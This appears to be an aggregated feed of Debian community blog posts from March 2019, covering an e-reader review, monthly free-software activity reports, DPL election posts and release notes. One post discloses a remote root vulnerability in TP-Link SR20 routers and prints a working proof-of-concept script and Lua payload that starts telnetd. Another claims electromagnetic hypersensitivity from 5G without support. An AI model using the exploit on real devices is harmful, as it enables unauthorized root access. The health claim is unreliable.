Not entirely sure why - maybe the slow UI, or the fact that it didn’t have a backlight, or who knows why. Together with my overall reading volume, my ebook use decreased to the extend that maybe I read 2-3 books per year on it. I even have to admit reading more on a tablet, despite the drawbacks (of reading on an LCD screen). One thing I really appreciated on tablets was the fast UI and the large screen. But since Sony closed its eReader division, no new models…

Then, a few weeks back, there was a thread at work about eBook readers vs. tablets, and seeing the people arguing left and right made me look at what would be the choices today when buying a new eReader, and to my surprise, there are pretty large screens available!

The largest ones are only 8 inches, so smaller than a tablet, but is that enough maybe? I read more and the Kobo Forma looked very interesting: good backlight (with blue filter), good size, albeit a very weird form factor.

Fortunately digitec had one in the showroom, so I was able to hold it in my hands, and together with what I read about it I was convinced. Sad to say goodbye to my Sony…

Why Kobo?

From my research, basically the choice is between Kindles and non-Kindles. I have serious reservations about Amazon, and on top of that I prefer the wide availability of the epub format, so the choice, as many times before, was clear.

On the “others” side, it seems there are two main choices, at least in Europe: either Tolino or Kobo. From reading about these two Tolino seems a more restrictive environment, with fewer formats supported. On top of that, it seems that Kobo bought either Tolino or the Tolino brand or the Tolino OS (not entirely sure), so double the argument to go with Kobo.

So on the Kobo large eReader side, there’s either Kobo Aura one, or Kobo Forma, which was much newer (~2 years), and the reviews didn’t point much either way, except that the Forma has also physical buttons (which Sony readers were doing very well). Very clearly then, the Forma it was.

I’d wished the 32 GB model was available, but no, here only the 8GB model is, but that’s enough. So, bought and eager to see how it is.

First impressions

Note: all the handling here is with a cover, not standalone.

The form factor, and especially the asymmetry of the layout: not a problem at all after a couple of hours. Despite still having a 4:3 (1.33×) screen aspect ratio, the (overall) more square ~1.1x ratio is actually well suited visually for landscape reading; the Sony had a 4:3 (1.33×) screen but the body was an almost 1.5× ratio (due to buttons on the bottom), much more book-like, which seems awkward to read in landscape mode, irrespective of actual screen content. So, not only is the form factor not a downside, but it’s actually an advantage!

The backlight works very well, although I only use it in the 0-10% range, and tweaking exact value here is a bit cumbersome. But it works, and the blue light filter is awesomeness++, no problems with it at night - on the contrary, it easily puts me to sleep :) The only small downside is that it eats battery faster, not sure whether due to the backlight or the larger screen, but I presume the former.

The biggest surprise though was how well the large screen is on the eyes, and the fact that it is large enough to enable reading technical books/documents! This I was never able to do on my Sony’s, due to the small size, but on the Forma, double-good. Even diagrams/drawings work OK (not well), so all good.

Portability-wise, it’s large, so doesn’t fit in pockets (and I tried). Aside from that, I can still easily read on the train or while walking so all good.

ePub vs. kePub, oh my!

The first weird thing that one reads about Kobo eReaders is the so-called “kepub” format. Kobo, it seems like many other companies, thought they can do better by having their own eBook format.

But “kepub” is just epub with a custom extension, or at least epub is forward compatible to kepub. Using a book that the reader sees as kepub format brings a couple of advantages:

  • progress report (this chapter left time, overall book left time)
  • per-chapter page numbers (which annoys me to no end)
  • zooming into drawings (double-tap)

The latter is very useful, the first point mildly so, so I’ve settled on using “kepub” as the book format.

Book management

As usual, I manage my eBook collection using Calibre. I have a long collection of books I bought over the years and now over different eReader brands, so I can’t rely on Kobo’s store or any other store to manage my books. Sure I might buy books on Kobo if I really need to, but unless they’re DRM-protected, they’ll go through Calibre before landing on my reader. To be very clear, I buy all my books, but I strongly lean towards DRM-free publishers (which is one reason to avoid a Kindle, but not the only one). I mean here companies such as LeanPub, Manning Publications, etc.. Non-exhaustive list, just some recent examples.

Fortunately Calibre works well with the Kobo as well, so moving my books over was easy, at least for the DRM-free ones. But kepub! Even for this there’s a nice solution: the Kobo Touch Extended plugin, which converts to kepub on the fly (and doesn’t require one to store their books in both epub and kepub). That driver works very well, even collection support is there and a bit more flexible than with the Sony’s, and on top it has series support as well, so happy camper.

Collections note: due to how the (native) reader works, setting the book metadata correctly is only possible once the reader has seen the book. So: plug in, transfer from Calibre, eject, insert again, and at this point Calibre can set the collections for the book. Slightly annoying, but not much.

“Hacking” the Kobos

While reading how to configure my reader, to my surprise I learn that installing additional software on these readers is rather trivial. Well, sadly, that means there’s no firmware update protection as in verification, but I guess you can’t have both. The only snag is how to launch this additional software (and then one reads about KSM vs fmon vs kfmon), but otherwise very simple.

So what additional software can one install? Well, to my surprise, the actual “reader” part. While “nickel” (the built-in reader) works well with (k)epub, it still has limitations, some of the small some of the large. For example: hyphenation support, ligatures, but most of all, PDF (non-reflowable content) support.

I’m fortunate to not have many PDFs (none, actually, I think), but I have to admit this screenshot looks just beatiful. If that link is broken, go to the Plato homepage. There’s also the other option of KOReader, which seems more featured (e.g. native integration with Calibre!). And both of these are open source!

For now, I’m staying with the official reader, but it’s very good to know one has multiple options, especially as you can still use the native reader (i.e. they’re in addition to it, not replacing it).

Conclusion

I’m just less than two weeks with the Forma, and I’ve already read 2½ books on it. For me, that’s surprising—as I was saying, that’s how much I read in the last year on my previous reader. So far I like this device very much, and I definitely recommend it for both normal books and—for the first time—for technical books.

Happy to answer any question (I can) about the device, just ask below.

31 March, 2019 05:24PM

hackergotchi for Jonathan Carter

Jonathan Carter

Free Software Activities (2019-03)

Wow. March is over already. Picture above taken on weekend away on a wine farm in Robertson, Western Cape.

Debian packaging work

2019-03-01: Upload new upstream version of bundlewrap (3.6.0-1) to debian unstable.

2019-03-05: Work on updating python-aniso8601 to version 5.1.0, defer upload due to new dependency: relativetimebuilder (needs packaging).

2019-03-11: Upload live-config (5.20190312) to debian unstable (Closes: #921921).

2019-03-12: Upload new upstream version of powerlevel9k (0.6.7-1) to debian unstable.

2019-03-13: File bug for removal of stale python-fabulous-doc package from debian unstable (ROM: #924469).

2019-03-14: Upload new upstream version of gnome-shell-extension-dash-to-panel (19-1) to debian unstable

2019-03-23: Upload new upstream version of bundlewrap (3.6.1-1) to debian unstable.

2019-03-23: Work on updating gamemode (1.2-1 to 1.3-1), some build problems with inih submodules.

2019-03-23: Upload new upstream version of gnome-shell-extension-dashtodock (66-1~exp1) to debian experimental.

2019-03-24: Upload calamares (3.2.4-4) to debian unstable.

2019-03-24: Upload connectagram (1.2.9-4) to debian unstable.

2019-03-24: Upload fracplanet (0.5.1-4) to debian unstable.

2019-03-24: Upload fractalnow (0.8.2-3) to debian unstable.

2019-03-25: Upload new upstream version of xfce4-screensaver (0.1.4-1~exp1) to debian experimental (Closes: #921835).

2019-03-25: Merge MR#1 for calamares (fix typo).

2019-03-26: File ITP for gnome-shell-extension-draw-on-your screen (ITP: #925518).

2019-03-26: Upload live-wrapper (0.9) to debian unstable (Closes: #924000).

2019-03-28: Upload xfce4-screensaver (0.1.3-1~exp2) to debian experimental.

Debian package sponsoring

2019-03-10: Sponsor package jag (0.3.5-4) for debian unstable (e-mail request).

2019-03-12: Sponsor package vitetris (0.57.2-3) for debian unstable (mentors.debian.org request) (Closes: #923969).

2019-03-12: Sponsor package blastem (0.6.3-1) for debian unstable (mentors.debian.org request) (Closes: #924177).

DebConf

Lots of stuff not mentioned here, I’m just not used to tracking this, but will hopefully get better at it.

2019-03-05: Take on two new DebConf roles that will consume a lot of time in the immediate future. I’m joining Nattie in a mentoring role for the DC19 team and heading up the bursaries team for the DC19 cycle.

2019-03-15: DebConf committee meeting to decide DC20 location.

Debian quality assurance

2019-03-11: Spot check latest weekly live builds mostly to check EFI/BIOS status when installing via calamares and current status of all desktop environments.

2019-03-30: Troubleshoot grub/luks/live issues.

Debian project leader campaign

Answered lots of questions throughout the month on the debian-vote list that you can read there.

2019-03-14: Jump into the volcano and declare my self-nomination to run for Debian project leader.

2019-03-18: Submit platform for DPL election to Debian secretary.

2019:03-19: Publish blog post “Running for DPL“.

2019-03-20: Publish blog post “GitLab and Debian“.

2019-03-23: Work on platform rebuttals.

2019-03-26: Publish blog post “DPL 2019 Election: Rebuttals“.

2019-03-28: Publish blog post “Fun and Debian“.

31 March, 2019 04:47PM by jonathan

hackergotchi for Chris Lamb

Chris Lamb

Free software activities in March 2019

Here is my monthly update covering what I have been doing in the free software world during March 2019 (previous month):

  • My activities as the current Debian Project Leader are covered in my Bits from the DPL (March 2019) email to the debian-devel-announce mailing list. Attentive followers of the on-going Debian Project Leader Elections will have noted that I am not running for a consecutive third term, so this was therefore my last such update, at least for the time being…

  • Presented at the Free Software Foundation's 2019 edition of LibrePlanet at Massachusetts Institute of Technology, Cambridge, MA on Redis Labs and the tragedy of the Commons Clause. It was great catching up with a large number of free software friends and colleagues. A splendid event as usual but a special congratulations here to Deb Nicholson for winning the FSF's award for the Advancement of Free Software.

  • As part of my duties of being on the board of directors of the Open Source Initiative I attended our monthy board meeting, participated in various licensing discussions occurring on the internet and formally approved the results of the recent OSI Board Member Election results which, as it happens, means that the Board is now predominantly female.

  • Updated my pull request for the shadow UNIX password system to make the build reproducible in order to support the case where secure_getenv(3) is not provided by the system C library. [...]

  • Opened pull requests for the Toil workflow engine [...] and the Vue.js URL router [...] to make their respective builds reproducible.

  • Attended a Debian Bug Squashing Party in Cambridge, United Kingdom. Thanks to Steve McIntyre for arranging and hosting the event.

  • For the Tails privacy-oriented operating system I reviewed and tested a number of feature branches (eg. #16452 & #16559) as well as contributed to a number of discussions on IRC, the mailing lists and on the issue tracker itself (eg. #16552).

  • Updated my django-agpl library — which makes it easier for Django web applications to satisfy the conditions of the GNU Affero General Public License — to set the correct mimetype for .zip files. [...]

  • Fastmail recently updated their user interface which had broken my Fastmail Enhancement Suite Chrome browser extension, requiring some attention. [...]

  • More hacking on the Lintian static analysis tool for Debian packages:

    • Check for placeholder "<project>" strings in debian/watch files as it can result in uscan(1) generating a file with shell metacharacters. (#923589)
    • Support dh-sequence-{gir,gnome,python3} virtual packages as satisfying various build-dependencies. (#924082)
    • Fix false-positives for the version-substvar-for-external-package tag when the Provides field contains multiple items or leading whitespace. (#833608)
    • Correct false-positives in when checking for dh-runit packages that lack a Breaks substitution variable. (#924116)
    • Don't detect non-maintainer upload versions when checking for maintainer scripts that support "ancient" package versions. (#924501)
    • Add itialize to the list of spelling-error-in-binary exceptions. (#923725)
    • Update a large number of tag long descriptions. [...][...][...]


Reproducible builds

Whilst anyone can inspect the source code of free software for malicious flaws almost all software is distributed pre-compiled to end users.

The motivation behind the Reproducible Builds effort is to ensure no flaws have been introduced during this compilation process by promising identical results are always generated from a given source, thus allowing multiple third-parties to come to a consensus on whether a build was compromised.

The initiative is proud to be a member project of the Software Freedom Conservancy, a not-for-profit 501(c)(3) charity focused on ethical technology and user freedom. Conservancy acts as a corporate umbrella, allowing projects to operate as non-profit initiatives without managing their own corporate structure. If you like the work of the Conservancy or the Reproducible Builds project, please consider becoming an official supporter.

This month, I:

I also made the following changes to our tooling:

diffoscope

diffoscope is our in-depth and content-aware diff utility that can locate and diagnose reproducibility issues.

  • Always warn if the tlsh module is not available (not just if a specific fuzziness threshold is specified) to match the epilog of the --help output. This prevents missing support for file rename detection. (#29)
  • Provide explicit help when the libarchive system package is missing / incomplete. (#50)
  • Fix a number of tests when using GhostScript 9.20 vs 9.26 for Debian stable vs. the same distribution with the security/point release applied. [...]
  • Improved the displayed comment whenever resorting to a binary diff to mention the file's type. (#49)
  • Make --use-dbgsym a ternary operator to make it easier to totally disable. (re. #2)
  • Explicitly mention when the guestfs module is missing at runtime and thus are falling back to a binary diff. (#45)
  • Tidied definition of the no file-specific differences were detected message suffix. [...]
  • Corrected a "recurse" typo [...] and uploaded version 113 to Debian unstable.

strip-nondeterminism

strip-nondeterminism is our tool to remove specific non-deterministic results from a completed build.


Debian

Patches contributed

  • pymongo: Please update the Homepage field. (#924078)

  • wondershaper: Suggest using $IFACE in an /etc/network/interfaces reference. (#924011)

Debian LTS

This month I have worked 18 hours on Debian Long Term Support (LTS) and 12 hours on its sister Extended LTS project.

  • Investigated and triaged cron, python2.7, python3.4, systemd, openssl (CVE-2019-1543), etc.

  • Frontdesk duties, responding to user/developer questions, reviewing others' packages, etc., particulary around the removal of the wheezy and jessie suites.

  • Issued DLA 1719-1 — it was discovered that there was a denial of service vulnerability in the libjpeg-turbo JPEG image library. A heap-based buffer over-read could be triggered by a specially-crafted bitmap file.

  • Uploaded ruby-i18n 0.7.0-2+deb9u1 to strech-security to prevent a remote denial-of-service vulnerability via an application crash. (#913093)

  • Updated the website to add some missing announcement texts.

Uploads

Finally, I also made the following non-maintainer uploads (NMUs) to fix release-critical (RC) bugs for the upcoming Debian buster release:

FTP Team

As a Debian FTP assistant I ACCEPTed 14 packages: gcc-9, gcc-9-cross, gcc-9-cross-ports, gnome-shell-extension-bluetooth-quick-connect, golang-github-facebookgo-structtag, golang-github-rs-zerolog, golang-gopkg-stretchr-testify.v1, httpdirfs-fuse, maint-guide, nvidia-graphics-drivers, piuparts, pyglet, qtbase-opensource-src & qtdeclarative-opensource-src.

31 March, 2019 03:55PM

Joerg Jaspert

Miscellaneous, DPL election, Archive changes, Crazyness

Miscellaneous

As usual, a long time since my last blog. Not that I have been idle, but usually I prefer doing real things over blogging. But hey, here goes one, could be getting long too.

A lot happened since I last blogged. Lets start with the boring stuff: I managed to get myself a slipped disc. Not a boring one either that could be treated “old school”. Would be boring, so I managed to get the whole disc out, leaving 2 bones of my spinal column sit directly on each other. All doctors had been quite surprised and told me they never saw an issue that big.

Surgery, recovery time, life

As it was impossible to do anything except for a surgery, there was no question about it, surgery it had to be. I surprised the docs with telling them Not before day X, as I had a quite important appointment on that day - my son starting school. Day after I let them cut me open and put in an implant.

Recovery times.

Some three and a half hours of surgery are taking an impressive amount of energy out of one, wouldn’t have thought it that bad. Combined with an order to mostly lie down flat for quite a while, it took longer than expected to get back up.

At some point I was told to mostly walk or lie, try not standing still or sitting too much. At the same time the school of my son looked for help during noon hours, so I took my walk time to monitor some elementary school kids. Turns out I am way better at it than anyone expected and they really love me, always asking when I come again, now that I am back at my normal job.

Life

Except for that excitement with a surgery, life is happy normal, which is good. 2 kids around means it is not boring. Work sponsored me a new e-bike, so I am using that a lot - and my older son always wants to go with me. By now he manages 40km tours and plans to reach at least 50km this summer, more if possible. Impressive for a 6, soon 7, years old.

DPL

As some may have noticed, I nominated myself for this years DPL election. Crazy times, indeed. Got four other candidates, one has withdrawn in the meantime, so we will have a ballot with 5 options (don’t forget famous NOTA).

My company helpfully agreed on quite a bunch of time I can take, should I really get elected, which I think will also help the other areas I am active in.

I won’t bore you with repeating what I said in my platform or on the Debian Vote List, if you are interested in the DPL election business, feel free to read through it all. It is certainly an interesting campaigning period until now.

Whoever will win in the end, I am sure it will be a good DPL.

Archive changes

Something that turned out to be more felt by people out there have been my recent archive changes. I finally went and archived the wheezy release, long out of support is is. And also jessie, which is only partly out of support - LTS is still active.

Deleting files

Just archiving (moving things to the archive.debian.org machines does not really gain much, the goal is to free up space in the main archive and on the mirrors. Which means deleting the suites and all their files from the archive. For wheezy, that was simple, just use the dak archive tools to set all involved suites empty. Then the usual cleanup processes will get rid of the files, and in a way that mirrors won’t break. Say, deleting only a certain number of files at one mirror push, as our mirrors limit how many files can be deleted at once.

For jessie it was a little more complicated, as the LTS architectures should continue to exist. So it wasn’t a simple “delete it all”, but the right set of files needed to stay around.

Turns out that, while those removals are all fine, at least some suites should continue to stay alive, even if they are empty. Or they generate errors on users systems that don’t really need to be. Say, the jessie-updates suite, while being empty and not receiving any updates anymore (LTS goes via security archive only) is configured per default everywhere.

Crazyness

A while ago there have been two cases in the Debian project where we had to enforce rules and actively take away membership. Something which never was, nor will it ever be, an easy decision.

One of those cases resolved itself nicely in the meantime, in time for the running DPL election even.

The other one seems hell bent on proving our decision right every other day. And ensuring they won’t ever be able to be called Debian Developer, as sad as it is. It is astonishing how much one can defy reality, spit out lies and false accusations and live in a bubble. The sad thing just being how much energy this is needlessly taken away from all people involved.

31 March, 2019 09:09AM

March 30, 2019

Molly de Blanc

Free software activities (March, 2019)

March was overrun with work, work, work. Planning a conference takes a lot out of you and consumes a lot of time, even when you’re getting paid to do it.

A photo of a branch of kwanzen cherry tree blossoms, several of which are budding and several of which are in full bloom.

I used to volunteer to run conferences and, looking back on it, I don’t know how we managed with a part-time, all volunteer crew. LibrePlanet is organized by the FSF staff, with various pre-conference help from technical volunteers, and a small army of volunteers at the conference itself.

March activities (personal)

  • I ran for and was re-elected to the Open Source Initiative board of directors.
  • The OSI had one board meeting, and a call to ratify the results of the elections.
  • I worked on talks for FOSS North and Linux Fest North West.
  • I applied to speak at All Things Open.
  • I applied to speak at !!con and was subsequently rejected. #speakerlife.
  • I submitted sessions to DebConf 19 AND YOU SHOULD TOO.
  • I attended my first Bug Squashing Party in Paris!
  • Along with the rest of the Debian Outreach Team, I worked on the project’s participation in Outreachy and GSoC.
  • The Debian A-H team met, and handled incident reports.
  • March brought the 8th and 9th instances –the latter just under the wire — of people being mean to me on the internet. I had a mocha and a cappuccino, respectively. Edit: The 10th instance also happened in March. I almost missed it! -mdb March 31, 2019.

March activities (professional)

  • I (along with an amazing team) ran a conference. That’s pretty much all I did.

30 March, 2019 02:48PM by mollydb

Daniel Stender

Series of screencasts related to DevOps and Debian packaging

Howdy! I’ve begun a series of DevOps and Debian packaging related screencasts which are provided on a channel at Youtube.

At the moment there is:

The screencasts are straightforward without any fuzz: you have to type in this and that happens. More stuff is coming up if there are some subscriptions.

30 March, 2019 06:37AM

March 29, 2019

hackergotchi for Mike Gabriel

Mike Gabriel

Picnic in the Dead Zone

Today, I talked to Christoph. He is from a local, rather new intiative here in Nothern Germany:

     Picknick im Funkloch

(Picnic in the Dead Zone).

We discussed how DAS-NETZWERKTEAM (my FLOSS business) can support that initiative on the technical level (we will start with mailing lists).

The Picnic in the Dead Zone initiative aims at making people more aware of possible health and social consequences that may be caused by the upcoming 5G mobile standard reaching 90%-plus coverage.

Personally, I know individual people who are (highly) sensitive to electro-magnetic radiation and fields (they can tell you if wireless network is on or off, tell you which access point where in the house is on or off, can differentiate between WiFi and PoweLAN, etc.). For people with such a sensitivity it is crucial to have spots in the country they want to live in, where electro-magnetic radiation is at a minimum level. Mobile connectivity does not work for everyone. Hyper-sensitive people suffer from it, in fact.

@all-the-Germans: Currently, there is an ePetition waiting for (maybe your) signature(s) on the German Bundestag's ePetition home page. The signing deadline is pretty close: 4th April 2019. If you think, that we should re-consider the whole 5G technology once more, study its impact on animal (including ourselves) physiology and plant physiology a little bit better, then please take some time and visit this URL and consider signing the following petition (if, do it asap):

https://epetitionen.bundestag.de/petitionen/_2018/_12/_05/Petition_88260...

light+love
Mike

29 March, 2019 09:13PM by sunweaver

hackergotchi for Louis-Philippe Véronneau

Louis-Philippe Véronneau

Montreal's Debian & Stuff - April 2019

We had another Debian & Stuff in Montreal last weekend. Some people from the local FOSS community wanted to gather and watch the LibrePlanet 2019 livestream and we thought merging it with a D&S would be a good idea.

People came and went, but all in all around 10 people showed up and we had tons of fun. I ended up hacking some more on my Tor Puppet module and played around with packaging the Tomu's bootloader in Debian.

Some of the talks were really great. The videos aren't online yet, but if you eventually want to watch some of them, Tarek Loubani's opening keynote on FOSS and medical devices in Gaza was amazing (and hard to watch1). I also really enjoyed Shauna Gordon-McKeon's talk on governing the software commons.

Thanks to the folks at Koumbit for hosting us!

  1. Amongst other things, he played videos of Israeli soldiers cheerfully sniping civilians, showed multiple pictures of kids loosing limbs and told us how a fellow doctor he was working with got pinned down and killed by sniper rounds fired by the IDF while trying to rescue injured civilians. 

29 March, 2019 08:45PM by Louis-Philippe Véronneau

hackergotchi for Martin Michlmayr

Martin Michlmayr

FOSSASIA 2019 in Singapore

I attended FOSSASIA earlier this month. This conference has been on my radar for many years but I never managed to attend before.

I was impressed by the organization of the conference. Furthermore, I liked that the audience was completely different to the conferences I normally attend. There were so many new people. FOSSASIA has grown not just to be a conference, but also an umbrella organization for several open source projects.

I gave a talk about open source culture, using Debian as an example. I find this type of presentation important because this is where a lot of pitfalls are for many new contributors. Learning technologies is easy, but figuring out all the unwritten norms and rules of a community can be daunting. Of course, it was particularly interesting to give this talk in an environment where I'm the cultural outsider. While I've visited a number of Asian countries, there's a lot about the different cultures I have yet to learn.

I met a number of Debian contributors, including Andrew Lee, Norbert Preining (who talked about TeX Live), Graham Williams (who used to contribute to Debian in the early days and heads an AI team at Microsoft in Singapore now), Kai Hendry (who used to contribute to Debian) and others. I also spent some time away from the conference to write my DPL platform.

Thank you to Hong Phuc Dang, Mario Behling and all the other organizers and volunteers for a wonderful event!

29 March, 2019 07:42AM by Martin Michlmayr

hackergotchi for Dirk Eddelbuettel

Dirk Eddelbuettel

drat 0.1.5: New release

drat user

A new version of drat just arrived on CRAN. And like the last time in December 2017 it went through as an automatically processed upgrade directly from the CRAN prechecks. Being a simple package can have its upsides…

And like the last time, this release once again draws largely upon contributed pull requests. Neal Fultz cleaned up how Windows paths are handled when inserting Windows (binary) packages. And Christoph Stepper extended the support for binary packages the helper commands pruneRepo and archivePackages. I added a minor cleanup to a test Neal added in the previous version, and that made a quick and simple release!

drat stands for drat R Archive Template, and helps with easy-to-create and easy-to-use repositories for R packages. Since its inception in early 2015 it has found reasonably widespread adoption among R users because repositories with marked releases is the better way to distribute code.

As your mother told you: Friends don’t let friends install random git commit snapshots. Rolled-up release it is. And despite what some (who may not know it well) say, drat is actually rather easy to use, documented by five vignettes and just works.

The NEWS file summarises the release as follows:

Changes in drat version 0.1.5 (2019-03-28)

  • Changes in drat functionality

    • Windows paths are handled better when inserting packages (Neal Fultz in #70)

    • Binary packages are now supported for the pruneRepo and archivePackages commands (Christoph Stepper in #79).

  • Changes in drat documentation

    • Properly prefix R path in system call in a tests (Dirk in minor cleanup to #70).

Courtesy of CRANberries, there is a comparison to the previous release. More detailed information is on the drat page.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

29 March, 2019 01:34AM

March 28, 2019

hackergotchi for Matthew Garrett

Matthew Garrett

Remote code execution as root from the local network on TP-Link SR20 routers

The TP-Link SR20[1] is a combination Zigbee/ZWave hub and router, with a touchscreen for configuration and control. Firmware binaries are available here. If you download one and run it through binwalk, one of the things you find is an executable called tddp. Running arm-linux-gnu-nm -D against it shows that it imports popen(), which is generally a bad sign - popen() passes its argument directly to the shell, so if there's any way to get user controlled input into a popen() call you're basically guaranteed victory. That flagged it as something worth looking at, but in the end what I found was far funnier.

Tddp is the TP-Link Device Debug Protocol. It runs on most TP-Link devices in one form or another, but different devices have different functionality. What is common is the protocol, which has been previously described. The interesting thing is that while version 2 of the protocol is authenticated and requires knowledge of the admin password on the router, version 1 is unauthenticated.

Dumping tddp into Ghidra makes it pretty easy to find a function that calls recvfrom(), the call that copies information from a network socket. It looks at the first byte of the packet and uses this to determine which protocol is in use, and passes the packet on to a different dispatcher depending on the protocol version. For version 1, the dispatcher just looks at the second byte of the packet and calls a different function depending on its value. 0x31 is CMD_FTEST_CONFIG, and this is where things get super fun.

Here's a cut down decompilation of the function:
int ftest_config(char *byte) {
  int lua_State;
  char *remote_address;
  int err;
  int luaerr;
  char filename[64]
  char configFile[64];
  char luaFile[64];
  int attempts;
  char *payload;

  attempts = 4;
  memset(luaFile,0,0x40);
  memset(configFile,0,0x40);
  memset(filename,0,0x40);
  lua_State = luaL_newstart();
  payload = iParm1 + 0xb027;
  if (payload != 0x00) {
    sscanf(payload,"%[^;];%s",luaFile,configFile);
    if ((luaFile[0] == 0) || (configFile[0] == 0)) {
      printf("[%s():%d] luaFile or configFile len error.\n","tddp_cmd_configSet",0x22b);
    }
    else {
      remote_address = inet_ntoa(*(in_addr *)(iParm1 + 4));
      tddp_execCmd("cd /tmp;tftp -gr %s %s &",luaFile,remote_address);
      sprintf(filename,"/tmp/%s",luaFile);
      while (0 < attempts) {
        sleep(1);
        err = access(filename,0);
        if (err == 0) break;
        attempts = attempts + -1;
      }
      if (attempts == 0) {
        printf("[%s():%d] lua file [%s] don\'t exsit.\n","tddp_cmd_configSet",0x23e,filename);
      }
      else {
        if (lua_State != 0) {
          luaL_openlibs(lua_State);
          luaerr = luaL_loadfile(lua_State,filename);
          if (luaerr == 0) {
            luaerr = lua_pcall(lua_State,0,0xffffffff,0);
          }
          lua_getfield(lua_State,0xffffd8ee,"config_test",luaerr);
          lua_pushstring(lua_State,configFile);
          lua_pushstring(lua_State,remote_address);
          lua_call(lua_State,2,1);
        }
        lua_close(lua_State);
      }
    }
  }
}
Basically, this function parses the packet for a payload containing two strings separated by a semicolon. The first string is a filename, the second a configfile. It then calls tddp_execCmd("cd /tmp; tftp -gr %s %s &",luaFile,remote_address) which executes the tftp command in the background. This connects back to the machine that sent the command and attempts to download a file via tftp corresponding to the filename it sent. The main tddp process waits up to 4 seconds for the file to appear - once it does, it loads the file into a Lua interpreter it initialised earlier, and calls the function config_test() with the name of the config file and the remote address as arguments. Since config_test() is provided by the file that was downloaded from the remote machine, this gives arbitrary code execution in the interpreter, which includes the os.execute method which just runs commands on the host. Since tddp is running as root, you get arbitrary command execution as root.

I reported this to TP-Link in December via their security disclosure form, a process that was made difficult by the "Detailed description" field being limited to 500 characters. The page informed me that I'd hear back within three business days - a couple of weeks later, with no response, I tweeted at them asking for a contact and heard nothing back. Someone else's attempt to report tddp vulnerabilities had a similar outcome, so here we are.

There's a couple of morals here:
  • Don't default to running debug daemons on production firmware seriously how hard is this
  • If you're going to have a security disclosure form, read it


Proof of concept:
#!/usr/bin/python3

# Copyright 2019 Google LLC.
# SPDX-License-Identifier: Apache-2.0
 
# Create a file in your tftp directory with the following contents:
#
#function config_test(config)
#  os.execute("telnetd -l /bin/login.sh")
#end
#
# Execute script as poc.py remoteaddr filename
 
import binascii
import socket
 
port_send = 1040
port_receive = 61000
 
tddp_ver = "01"
tddp_command = "31"
tddp_req = "01"
tddp_reply = "00"
tddp_padding = "%0.16X" % 00
 
tddp_packet = "".join([tddp_ver, tddp_command, tddp_req, tddp_reply, tddp_padding])
 
sock_receive = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock_receive.bind(('', port_receive))
 
# Send a request
sock_send = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
packet = binascii.unhexlify(tddp_packet)
argument = "%s;arbitrary" % sys.argv[2]
packet = packet + argument.encode()
sock_send.sendto(packet, (sys.argv[1], port_send))
sock_send.close()
 
response, addr = sock_receive.recvfrom(1024)
r = response.encode('hex')
print(r)

[1] Link to the wayback machine because the live link now redirects to an Amazon product page for a lightswitch

comment count unavailable comments

28 March, 2019 10:18PM

hackergotchi for Jonathan Carter

Jonathan Carter

Fun and Debian

Brief background

When I started working on my DPL platform, I read through some platforms of recent years. Many of them made some mention of either making Debian a more fun project to contribute to, or keeping it so, even to the point where it has been considered a cliché. Recently, Lucas Nussbaum (DPL between 2013 and 2015), posted a list of DPL roles as he sees it, listing “Keep Debian fun and functional” as responsibility #0, so we know that it’s generally expected from the DPL to help make Debian a good project to be part of and contribute to.

In Marga’s platform that I linked above, she delves into what exactly “more fun” would mean. Oddly enough, few platforms which mentions ‘making Debian fun’ as a goal actually do that, which is also why I chose to be more specific in my platform about changes that I’d like to promote instead of just using a blanket term such as “make Debian more fun”.

Keeping employees engaged

The image below has been making rounds on the Internet for a long time, I couldn’t find it’s original source, but I think it’s still a great high-level summary of things that a company should keep in mind to keep their employees engaged and maintain a good relationship.

If you’re having trouble reading that, it says:

Employees stay engaged when they are:

  • Paid well
  • Mentored
  • Challenged
  • Promoted
  • Involved
  • Appreciated
  • Valued
  • On a Mission
  • Empowered
  • Trusted

Plenty of other platforms touched on some of these over the years. So I wondered… what would an ideal “Debian contributors stay when…” infographic look like?

Keeping and making fun in Debian

What’s great about the average Debian contributor is that they already want to be part of Debian. We don’t have to spend as much time as a commercial company does to incentivise a person to be part of the project. So I think in many ways, keeping Debian fun mostly involves removing bad obstacles/blockers and allowing a contributor to do their work with the least amount of friction. Having said that, I also believe that there is scope for making fun, that is, actively doing things that are enjoyable and that may attract more contributors.

Originally, I was going to write a loooooooooooooong piece on this and then make a graphic based on it, and around an hour in to it, around half way done, I realised it’s just going to be way too long and abandoned it in favour of going straight to the graphic.

So here goes, I call it version 0.0 of a Debian Fun Statement.

If you read DPL platforms this year and previous years, you’ll certainly recognise some elements from it. It reads:

In Debian, we’re having fun when:

  • we’re doing valuable work
  • we’re proud to be associated with the project
  • we’re feeling safe
  • we have opportunities to learn and grow
  • we figure out how to work out our differences
  • we work together on solutions
  • we’re efficient at making decisions
  • we’re getting things done
  • we’re sharing our knowledge with others
  • we feel appreciated
  • we feel understood
  • we feel included

I referred to it as a Debian Fun Statement and not the Debian Fun Statement, because I hastily put it together myself, it’s not official in any way at all. I think it might be worth while for us as a community to put together some nice final wording and for someone with graphic skills to do some nice layout/artwork.

As part of my campaign running for DPL, I want to let Debianites know that I plan towards making all of the above count for every Debian contributor. I tried to encode that as much as possible in to my platform, and hope that it comes across that way when you read it. Feedback is always welcome, thanks for reading!

28 March, 2019 05:57PM by jonathan

hackergotchi for Thomas Lange

Thomas Lange

New FAI version and ISO images

The new version FAI is available in two variants. FAI 5.8.4 is for Debian buster and FAI 5.8.4~bpo9+2 is the same for the stable distribution called stretch, including the configs for stretch.

You can get the packages when adding one of these lines to your sources.list:

deb https://fai-project.org/download stretch koeln

or

deb https://fai-project.org/download buster koeln

New FAI ISO images using stretch are now available from [1]. The FAIme build service [2] for customized cloud and installation images also uses the newest FAI versions.

[1] https://fai-project.org/fai-cd/

[2] https://fai-project.org/FAIme

FAI

28 March, 2019 04:42PM

hackergotchi for Holger Levsen

Holger Levsen

20190328-mini-debconf-hamburg-2019

Registration now open for the Mini-DebConf in Hamburg in June 2019

Moin!

With great joy we are finally offically announcing the Debian MiniDebConf which will take place in Hamburg (Germany) from June 5 to 9, with three days of Debcamp style hacking, followed by two days of talks, workshops and more hacking. And then, Monday the 10th is also a holiday in Germany (and some other countries), so you might choose to extend your stay by a day! (Though there will not be an official schedule for the 10th.)

TL;DR: We're having a MiniDebConf 2019 in Hamburg on June 5-9 It's going to be awesome. You should all come! Register now!

